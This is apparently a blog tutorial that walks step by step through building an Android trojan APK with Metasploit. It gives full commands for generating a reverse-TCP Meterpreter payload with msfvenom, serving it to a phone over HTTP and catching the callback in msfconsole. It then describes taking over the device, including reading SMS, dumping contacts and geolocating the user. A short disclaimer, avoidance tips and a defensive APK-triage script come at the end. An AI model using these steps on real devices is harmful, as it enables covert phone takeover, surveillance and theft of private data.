We will be seeing how you can hack into your phone in 2022 using the Metasploit Framework. The attack is carried out with a Trojan APK created using Metasploit.
Disclaimer: this post is only meant to illustrate these attacks and is purely for educational purposes.
What is Metasploit?
Metasploit is an open-source computer security project maintained and developed by Rapid7. It includes a set of tools that help an organization's cyber security analysts find bugs in their systems and recommend ways to fix them. It usually comes pre-installed in Kali Linux. It contains over 590 modules; some of the important ones are mentioned below.
- Command shell enables users to run collection scripts or arbitrary commands against the host.
- Meterpreter (the Metasploit Interpreter) enables users to control the screen of a device using VNC and to browse, upload and download files.
- Dynamic payloads enable users to evade anti-virus defense by generating unique payloads.
- Static payloads enable static IP address/port forwarding for communication between the host and the client system.
Installing Metasploit
- You can run the following commands to install Metasploit on your Linux server:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
- Metasploit is also available for other operating systems; see Rapid7's installation documentation for those.
- If you are looking for a cloud server to test Metasploit on, consider Vultr.
Playing with Metasploit
- To find the public IP of our instance (a VM in the cloud), we run
wget -qO - ipinfo.io
which should give you output similar to this:
{
"ip": "11.22.33.444",
"hostname": "8.9.8.1.bc.googleusercontent.com",
"city": "Singapore",
"region": "Singapore",
"country": "SG",
"loc": "1.2897,103.8501",
"org": "AS396982 Google LLC",
"postal": "018989",
"timezone": "Asia/Singapore",
"readme": "https://ipinfo.io/missingauth"
}
- The ip field in the JSON is the public IP of your instance.
- If you're running on your local network, you have to find the internal IP of your instance instead by running
ifconfig
- Before we proceed further, we have to create a Trojan, which we can do by running the command below
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.106.0.2 LPORT=4444 R> /var/www/html/payload.apk
- The -p argument indicates the payload we are going to use. In this case it is
android/meterpreter/reverse_tcp
- LHOST is the host on which you want to receive the connection from the victim. Change this value to either the public or the internal IP of your instance.
- LPORT is the port on which you want to receive the connection from the victim. You can either change this value or use the default, which is 4444.
- R> writes the generated payload to the specified path with the specified extension.
- Now go to the directory where the payload has been generated. In my case it is
cd /var/www/html
and run
python -m SimpleHTTPServer 1234
(on Python 3 the equivalent is python3 -m http.server 1234) to spin up a temporary web server on port 1234.
- Now you can download the APK file onto your phone just by visiting
http://private_or_public_ip:1234/filename.apk
- Once you download the APK and try to install it, you may get a warning window popping up where you have to choose the Install anyway option.
- Now head over to the instance's terminal and open Metasploit by running
msfconsole
and run the following commands
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit
- Change the values of LHOST and LPORT to the ones you configured earlier.
- Now open the application you installed. Its name should be Main Activity.
- After you open the app, head back to the terminal: a new Meterpreter session should have opened, in which you have full control of the device.
- The session also includes commands to interact with the device's filesystem.
- You will also find commands to read or send SMS and even to dump all the contacts.
- To list all the available commands, just run
?
or
help
- Let's see how we can locate the user's current position by running a single command:
geolocate
Tips to stay away from a Trojan attack
- Do not download APKs from untrusted sources.
- In this post I've only shown how to create a bare Trojan APK, but real attackers may merge the Trojan into a legitimate app and ask you to download that APK. If you would like to know how a Trojan can be merged into another APK file, let me know in the comment section below.
- Examine the code before you install any open-source application.
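A defender-side counterpart to the tips above, added here and not part of the original post: a Python triage script that unpacks an APK (it is a zip archive), lists the permissions declared in its binary AndroidManifest.xml and looks in classes.dex for the class-name strings the stock Metasploit Android stage is known to carry. The permission set, the "two or more" threshold and the sample APKs built in memory are constructed assumptions for illustration, and a repackaged trojan with renamed classes would pass the marker check, so treat the result as a triage hint, not a verdict.

```python
import io
import re
import zipfile

# Permissions matching what the post's session does (SMS, contacts, location).
# The set and the "two or more" threshold are illustrative assumptions.
DANGEROUS = {
    "android.permission.READ_SMS", "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS", "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA", "android.permission.READ_CALL_LOG",
}
# Class descriptors the stock Metasploit Android stage carries in classes.dex.
# A renamed/repackaged trojan will not show them: a miss proves nothing.
STAGE_MARKERS = (b"Lcom/metasploit/stage/", b"com.metasploit.stage")
PERM_RE = re.compile(r"android\.permission\.[A-Z_]+")


def _strings(blob: bytes) -> str:
    """Binary AndroidManifest.xml normally stores its string pool as UTF-16LE;
    also decode byte-wise so a UTF-8 pool is seen by the regex too."""
    return blob.decode("utf-16-le", errors="ignore") + "\n" + blob.decode("latin-1")


def triage_apk(apk_bytes: bytes) -> dict:
    """Return declared permissions, stage markers found and a verdict."""
    result = {"permissions": set(), "stage_markers": [], "verdict": "ok"}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        if "AndroidManifest.xml" in names:
            manifest = _strings(z.read("AndroidManifest.xml"))
            result["permissions"] = set(PERM_RE.findall(manifest))
        for name in names:  # classes.dex, classes2.dex, ...
            if name.startswith("classes") and name.endswith(".dex"):
                dex = z.read(name)
                result["stage_markers"] += [m.decode() for m in STAGE_MARKERS if m in dex]
    result["risky_permissions"] = result["permissions"] & DANGEROUS
    if result["stage_markers"]:
        result["verdict"] = "known-stage"
    elif len(result["risky_permissions"]) >= 2:
        result["verdict"] = "review"
    return result


def build_sample_apk(perms, dex_text: bytes) -> bytes:
    """Constructed test data: a minimal zip shaped like an APK, not a real app."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", "\0".join(perms).encode("utf-16-le"))
        z.writestr("classes.dex", dex_text)
    return buf.getvalue()
```

Run it against a real download with `triage_apk(open("payload.apk", "rb").read())`; anything other than "ok" deserves a look at the manifest before tapping Install anyway.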
Thanks for reading till the end. Let me know if you have any queries in the comment section below.